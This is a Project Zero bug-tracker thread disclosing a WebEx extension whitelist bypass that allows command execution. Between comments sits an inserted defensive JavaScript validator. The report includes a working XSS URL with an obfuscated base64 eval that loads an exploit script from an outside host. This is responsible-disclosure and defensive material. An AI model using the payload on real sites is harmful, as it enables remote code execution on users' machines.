Status: Fixed
Owner:
Closed: Jan 2017
Cc:

Blocked on:
issue 1324

Blocking:
issue 1096
Cisco: WebEx: New Arbitrary Command Execution in 1.0.5 via Module Whitelist Bypass
Project Member Reported by taviso@google.com, Jan 25 2017
In version 1.0.5 of the WebEx extension, Cisco added a GpcComponentName whitelist to prevent exploitation via XSS, preventing issue 1096.

This can be defeated by putting a module signed by Cisco under GpcUrlRoot, and tricking the installation routine to overwrite one of the whitelisted modules with it. As I already have a copy of MSVCRT.DLL signed by Cisco, I used this one in my exploit.

This requires an XSS on *.webex.com, but they're unfortunately not difficult to find.

Here is a working example:

https://support.webex.com/support/documentation/wwhelp/wwhimpl/common/html/frameset.htm#?");eval(atob("ZD1kb2N1bWVudDsocz1kLmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vbG9jay5jbXB4Y2hnOGIuY29tL0pvUGhlaTdhL3dlYmV4LmpzJztkLmhlYWQuYXBwZW5kQ2hpbGQocyk7"));("

(The eval just loads this script: https://lock.cmpxchg8b.com/JoPhei7a/webex.js)

Please note that the script waits 10 seconds before running calc.exe to make sure everything is loaded.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Attachment: Windows 10-2017-01-24-19-23-30.png (822 KB)
Project Member Comment 1 by taviso@google.com, Jan 25 2017
Project Member Comment 2 by taviso@google.com, Jan 25 2017
Cc: cisco.ch...@gmail.com rbar...@mozilla.com
Project Member Comment 3 by taviso@google.com, Jan 25 2017
I made some minor changes to the exploit script.
Attachment: webex.js (7.1 KB)
Project Member Comment 4 by taviso@google.com, Jan 26 2017
Response:

Hi Tavis,
 
We are tracking this issue under the same ID as the previously reported issue: PSIRT-0085137008. Please include it on all communication to us regarding this vulnerability. I have also filed CSCvc88943 for our developers to investigate further.

[...]

Project Member Comment 5 by taviso@google.com, Jan 26 2017
Labels: -Restrict-View-Commit
Status: Fixed
It looks like Cisco have released version 1.0.7, which adds a whitelist for the GpcExtName and GpcUnpackName properties that I was using in my exploit.

It looks like they correctly handle Mac and Windows, and have also added some verification on GpcInitCall/GpcExitCall/etc so that functions have to match a RegEx. This looks like a huge improvement.

Another very quick response from Cisco, I continue to be impressed with Cisco's response time.

I do not currently know of any way to defeat this new patch. As the patch is public now, let's mark this fixed.

(Note: I believe the XSS is an independently discovered duplicate of CVE-2009-3731, which is already public).

http://www.webworks.com/Security/2009-0001/
https://web.archive.org/web/20101023162802/http://www.stratsec.net/Research/Advisories/VMWare-WebWorks-XSS
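The report above describes a bypass of a whitelist that only covered GpcComponentName, and comment 5 describes the 1.0.7 fix: allowlists for GpcExtName and GpcUnpackName plus a regex check on GpcInitCall/GpcExitCall. The following is an added example (not Cisco's code and not part of this thread) of a request validator in that shape. The property names come from the thread; the allowlist contents, the identifier regex, the bare-file-name rule and the sample requests are assumptions constructed for the demonstration.

```javascript
// Added example (not Cisco's code): validate a module-load request the way the
// hardened version is described above, so that naming an allowlisted component
// is no longer enough if the file to unpack or the entry points differ.

// Assumed allowlist of module names. Compared after lower-casing because the
// host runs on a case-insensitive filesystem on Windows.
const ALLOWED_MODULES = new Set(["component_alpha.dll", "component_beta.dll"]);

// Assumed rule for exported function names: a plain C identifier, nothing else.
const IDENTIFIER_RE = /^[A-Za-z_][A-Za-z0-9_]*$/;

// A module name must be a bare file name (no separators, no leading dots, so no
// "..\" traversal) and must match the allowlist exactly. A signed DLL placed
// under GpcUrlRoot with any other name is rejected before it can be unpacked.
function moduleAllowed(name) {
  if (typeof name !== "string") return false;
  const n = name.toLowerCase();
  return /^[a-z0-9_][a-z0-9_.-]*$/.test(n) && ALLOWED_MODULES.has(n);
}

function functionAllowed(name) {
  return typeof name === "string" && IDENTIFIER_RE.test(name);
}

// Returns { ok: true } or { ok: false, field, reason } naming the first field
// that failed, in the order the checks are applied.
function validateRequest(req) {
  for (const field of ["GpcComponentName", "GpcExtName", "GpcUnpackName"]) {
    if (!moduleAllowed(req[field])) {
      return { ok: false, field, reason: "not an allowlisted module name" };
    }
  }
  for (const field of ["GpcInitCall", "GpcExitCall"]) {
    if (!functionAllowed(req[field])) {
      return { ok: false, field, reason: "not a plain identifier" };
    }
  }
  return { ok: true };
}

// Constructed sample requests (hypothetical values, not captured traffic).
const legitimate = {
  GpcComponentName: "component_alpha.dll",
  GpcExtName: "component_alpha.dll",
  GpcUnpackName: "component_alpha.dll",
  GpcInitCall: "InitControl",
  GpcExitCall: "ExitControl",
};

const SAMPLE_REQUESTS = {
  legitimate,
  // The 1.0.5 whitelist looked only at GpcComponentName; this request names an
  // allowlisted component but asks for a different (signed, unlisted) file to
  // be unpacked over it. The extended allowlist catches it on GpcUnpackName.
  unlistedUnpack: { ...legitimate, GpcUnpackName: "msvcrt.dll" },
  // Directory traversal inside a module name is rejected by the bare-name rule.
  traversal: { ...legitimate, GpcExtName: "..\\component_alpha.dll" },
  // Anything other than an identifier in an entry-point name is rejected.
  badInitCall: { ...legitimate, GpcInitCall: "InitControl(); other" },
};

function report() {
  const out = {};
  for (const [label, req] of Object.entries(SAMPLE_REQUESTS)) {
    out[label] = validateRequest(req);
  }
  return out;
}

console.log(report());
```

The validator rejects on the first failing field so that a log line can name exactly which property was off-list; in practice every rejection at this layer is worth alerting on, since a legitimate extension build never produces one.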
Project Member Comment 6 by taviso@google.com, Jan 26 2017
Cisco's advisory is here

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170124-webex

Apparently Firefox and Internet Explorer were also affected, but not on Mac or Linux. I didn't check, but have no reason to doubt Cisco's assessment.
Project Member Comment 7 by mjurczyk@google.com, Feb 3
Labels: -Reported-2017-01-24 Reported-2017-Jan-24
Comment 8 Deleted
Comment 9 Deleted
Comment 10 Deleted
Project Member Comment 11 by taviso@google.com, Jul 6
Blockedon: 1324